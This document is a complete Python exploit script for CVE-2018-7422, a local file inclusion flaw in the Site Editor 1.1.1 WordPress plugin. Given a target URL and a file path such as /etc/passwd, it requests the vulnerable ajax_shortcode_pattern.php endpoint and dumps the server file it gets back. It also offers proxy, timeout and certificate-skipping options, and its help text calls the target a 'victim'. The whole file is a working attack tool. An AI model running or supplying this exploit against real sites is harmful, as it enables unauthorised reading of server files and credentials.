#!/usr/bin/env python3
import argparse
import sys

import requests
from termcolor import colored
def print_message(message, type):
    """Print *message* prefixed with a coloured ``[LEVEL]`` tag.

    ``type`` is the level name: SUCCESS, INFO, WARNING, ALERT or ERROR
    (it shadows the builtin, but it is part of the existing call signature).
    Any other value prints nothing, exactly as the original if/elif chain did.
    """
    # Level -> termcolor colour name.  WARNING and ALERT deliberately share
    # yellow; the tag text is the level name itself.
    level_colors = {
        'SUCCESS': 'green',
        'INFO': 'blue',
        'WARNING': 'yellow',
        'ALERT': 'yellow',
        'ERROR': 'red',
    }
    color = level_colors.get(type)
    if color is None:
        return
    print('[' + colored(type, color) + '] ' + message)
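def get_normalized_url(url):
    """Return *url* with a trailing ``/`` and an explicit scheme.

    A missing scheme defaults to ``http://``; an existing ``http://`` or
    ``https://`` prefix is detected case-insensitively and kept with the
    caller's spelling.

    Args:
        url: target or proxy location as typed on the command line.

    Returns:
        The normalised URL string.

    Raises:
        ValueError: if *url* is empty (the previous ``url[-1]`` check raised
            an unhelpful IndexError here).
    """
    if not url:
        raise ValueError("URL must not be empty")
    if not url.endswith('/'):
        url += '/'
    if not url.lower().startswith(('http://', 'https://')):
        url = "http://" + url
    return url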
def get_proxy_protocol(url):
    """Return ``'https'`` when *url* begins with an https scheme, else ``'http'``.

    Only the first eight characters are inspected, case-insensitively, so a
    bare host or an empty string yields ``'http'``.
    """
    scheme_prefix = url[:8].lower()
    return 'https' if scheme_prefix == 'https://' else 'http'
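def strip_last_line(original_string):
    """Return *original_string* with everything after its last newline removed.

    Used to drop whatever the vulnerable endpoint appends after the included
    file (presumably its own trailing output; confirm against the plugin).

    A string containing no newline is returned unchanged.  The previous
    ``rfind``-based version fed the ``-1`` "not found" result straight into a
    slice and so silently dropped the last *character* of such input, which
    for a dumped file means corrupting the output rather than trimming it.
    """
    head, separator, _tail = original_string.rpartition('\n')
    return head if separator else original_string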
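# Body the vulnerable endpoint returns when the requested path could not be
# included.  Matched verbatim against the response; do not "correct" it.
_MISSING_FILE_MARKER = "Error: didn't load shortcodes pattern file"
# Vulnerable plugin script, relative to the WordPress root (no leading slash:
# the normalised base URL already ends in '/').
_VULN_PATH = ("wp-content/plugins/site-editor/editor/extensions/pagebuilder/"
              "includes/ajax_shortcode_pattern.php")


def _build_parser():
    """Return the CLI parser.

    TARGET, FILE, -P/--proxy and -o/--outfile are unchanged; -t/--timeout and
    -k/--insecure are new and optional.
    """
    parser = argparse.ArgumentParser(description='Exploit for CVE-2018-7422: Local File Inclusion in WordPress Plugin Site Editor 1.1.1')
    parser.add_argument('TARGET', type=str,
                        help='Target Wordpress location (Example: http://localhost/wp/ or https://victim.xyz:8000/)')
    parser.add_argument('FILE', type=str,
                        help='Filename to gather from LFI (Example: "/etc/passwd" or "/etc/apache2/sites-enabled/000-default.conf")')
    parser.add_argument('-P', '--proxy', type=str,
                        help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
    parser.add_argument('-o', '--outfile', type=str,
                        help='File to write results to (Example: "result.txt" or "/tmp/result.txt)')
    parser.add_argument('-t', '--timeout', type=float, default=30.0,
                        help='Seconds to wait for the target before giving up (default: 30)')
    parser.add_argument('-k', '--insecure', action='store_true',
                        help='Do not verify the target TLS certificate (needed when intercepting HTTPS with a proxy)')
    return parser


def main():
    """Fetch FILE through the Site Editor LFI and print it or write it to disk.

    Exits with status 1 on request failure, an unexpected HTTP status, the
    plugin's "could not include" response, or an empty response body.
    """
    args = _build_parser().parse_args()
    base_url = get_normalized_url(args.TARGET)

    # FILE is appended verbatim, not percent-encoded, so payloads the caller
    # has already encoded are sent unchanged; a value containing '&', '#' or
    # whitespace must be encoded by the caller.
    exploit_url = base_url + _VULN_PATH + "?ajax_path=" + args.FILE

    proxies = {}
    if args.proxy:
        proxy_url = get_normalized_url(args.proxy)
        # requests chooses a proxy by the *target* URL's scheme.  Keying the
        # dict by the proxy's own scheme (as the original did) meant an
        # https:// target with an http:// proxy bypassed the proxy entirely.
        proxies = {"http": proxy_url, "https": proxy_url}

    try:
        response = requests.get(exploit_url, proxies=proxies,
                                timeout=args.timeout, verify=not args.insecure)
    except requests.exceptions.RequestException as exc:
        print_message("Request failed: " + str(exc), "ERROR")
        sys.exit(1)

    # Anything but 200 (e.g. a 404 page from a site without the plugin) would
    # otherwise be dumped as if it were the requested file.
    if response.status_code != 200:
        print_message("Unexpected HTTP status " + str(response.status_code)
                      + " - is the Site Editor plugin installed at this path?", "ERROR")
        sys.exit(1)

    response_raw = response.text
    if _MISSING_FILE_MARKER in response_raw:
        print_message("Likely attempting to retrieve non-existent file!", "ERROR")
        sys.exit(1)
    if response_raw.strip() == "":
        print_message("File appears empty!", "WARNING")
        print_message("Are you sure you have READ permissions on the file?", "INFO")
        sys.exit(1)

    file_content = strip_last_line(response_raw)
    if args.outfile:
        # newline='' keeps the server's line endings; an explicit encoding
        # avoids re-mangling the decoded text with the platform default codec.
        # NOTE: response.text is decoded with requests' guessed encoding, so a
        # binary file fetched this way is not reproduced byte-for-byte.
        with open(args.outfile, 'w', encoding='utf-8', newline='') as out:
            out.write(file_content)
    else:
        print(file_content)


if __name__ == "__main__":
    main()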